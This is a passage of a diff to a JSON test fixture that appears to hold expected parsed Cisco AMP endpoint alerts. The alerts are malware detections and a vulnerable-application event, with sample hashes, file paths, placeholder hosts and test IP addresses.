"cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 224000000, + "cisco.amp.timestamp_nanoseconds": 973000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257589777531000, + "event.id": 6533669929038643000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 274588, + "log.offset": 35375, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4899,60 +1285,64 @@ ] }, { - "@timestamp": "2021-01-15T10:11:44.000Z", + "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257564007727167", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643249", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 218000000, + "cisco.amp.timestamp_nanoseconds": 951000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257564007727000, + "event.id": 6533669929038643000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 275907, + "log.offset": 36701, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -4960,60 +1350,64 @@ ] }, { - "@timestamp": "2021-01-15T10:11:32.000Z", + "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257512468119614", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643248", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 581000000, + "cisco.amp.timestamp_nanoseconds": 576000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257512468120000, + "event.id": 6533669929038643000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 277226, + "log.offset": 38020, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5021,60 +1415,66 @@ ] }, { - "@timestamp": "2021-01-15T10:11:20.000Z", + "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257460928512061", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605487", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 569000000, + "cisco.amp.timestamp_nanoseconds": 333000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257460928512000, + "event.id": 6533669671340605000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 278545, + "log.offset": 39339, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5082,64 +1482,58 @@ ] }, { - "@timestamp": "2021-01-15T10:11:18.000Z", + "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.detection_id": "5825617812646789131", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605486", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 875000000, + "cisco.amp.timestamp_nanoseconds": 195000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5825617812646789000, + "event.id": 6533669671340605000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "bfcc0861c7fb965c1f7473d3dc42cff6", - "file.hash.sha1": "420da91c3199993c9f245b21ea060b69d7ecfd49", - "file.hash.sha256": "aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33", - "file.name": "5A.tmp", - "file.path": "\\\\?\\C:\\WINDOWS\\Temp\\5A.tmp", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.os.family": "windows", "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 279864, - "process.hash.md5": "60784f891563fb1b767f70117fc2428f", - "process.hash.sha1": "e6e904b84332191d44de729deb7bfed9bcef2ce9", - "process.hash.sha256": "e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f", - "process.name": "spoolsv.exe", - "process.pid": 1480, + "log.offset": 40665, "related.hash": [ - "aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33", - "bfcc0861c7fb965c1f7473d3dc42cff6", - "420da91c3199993c9f245b21ea060b69d7ecfd49" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_TDSS" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", @@ -5155,62 +1549,56 @@ ] }, { - "@timestamp": "2021-01-15T10:11:17.000Z", + "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.detection_id": "5825617808351821830", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605485", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 812000000, + "cisco.amp.timestamp_nanoseconds": 170000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5825617808351822000, + "event.id": 6533669671340605000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "4a052246c5551e83d2d55f80e72f03eb", - "file.hash.sha1": "bc29f1e8460915596e1dcafd0c92d6309457d149", - "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "file.name": "59.tmp", - "file.path": "\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\59.tmp", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 287092, - "process.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "process.name": "tdss.exe", - "process.pid": 3728, + "log.offset": 41991, "related.hash": [ - "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "4a052246c5551e83d2d55f80e72f03eb", - "bc29f1e8460915596e1dcafd0c92d6309457d149" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_TDSS" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", @@ -5226,60 +1614,64 @@ ] }, { - "@timestamp": "2021-01-15T10:11:09.000Z", + "@timestamp": "2021-01-15T10:20:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257409388904508", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669667045638188", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 56000000, + "cisco.amp.timestamp_nanoseconds": 779000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257413683872000, + "event.id": 6533669667045638000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 294937, + "log.offset": 43310, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5287,50 +1679,62 @@ ] }, { - "@timestamp": "2021-01-15T10:10:59.000Z", + "@timestamp": "2021-01-15T10:20:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "f5:8f:96:c3:53:1c" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.event_type_id": 1107296272, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.related.cve": [ + "CVE-2015-7204" + ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "f5:8f:96:c3:53:1c" ], - "cisco.amp.timestamp_nanoseconds": 267000000, - "event.action": "Executed malware", + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2015-7204", + "name": "Mozilla Firefox", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204", + "version": "41.0" + } + ], + "event.action": "Vulnerable Application Detected", "event.category": [ - "malware" + "file" ], "event.dataset": "cisco.amp", - "event.id": 1489955900267000300, + "event.id": 15210587194928, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:10:59.000Z", - "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "event.severity": 1, + "event.start": "2021-01-15T10:20:00.000Z", + "file.hash.sha256": "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f", + "file.name": "firefox.exe", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", + "host.hostname": "Demo_AMP_Exploit_Prevention", + "host.name": "Demo_AMP_Exploit_Prevention", "input.type": "log", - "log.offset": 296255, - "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", + "log.offset": 44629, + "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", "related.hash": [ - "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5" + "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f" ], "related.hosts": [ - "Demo_TDSS" + "Demo_AMP_Exploit_Prevention" ], "related.ip": [ "8.8.8.8", @@ -5343,60 +1747,66 @@ ] }, { - "@timestamp": "2021-01-15T10:10:56.000Z", + "@timestamp": "2021-01-15T10:19:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257357849296955", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669409347600427", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 607000000, + "cisco.amp.timestamp_nanoseconds": 257000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257357849297000, + "event.id": 6533669409347600000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 297536, + "log.offset": 46087, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5404,7 +1814,7 @@ ] }, { - "@timestamp": "2021-01-15T10:10:53.000Z", + "@timestamp": "2021-01-15T10:19:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -5416,7 +1826,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667064295456780", + "cisco.amp.detection_id": "6533669409347600426", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -5425,14 +1835,14 @@ "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 478000000, + "cisco.amp.timestamp_nanoseconds": 240000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533667064295457000, + "event.id": 6533669409347600000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -5440,15 +1850,13 @@ "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 298855, + "log.offset": 47413, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -5471,60 +1879,64 @@ ] }, { - "@timestamp": "2021-01-15T10:10:52.000Z", + "@timestamp": "2021-01-15T10:19:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257340669427770", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669405052633129", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 988000000, + "cisco.amp.timestamp_nanoseconds": 847000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257340669428000, + "event.id": 6533669405052633000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 300181, + "log.offset": 48732, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], 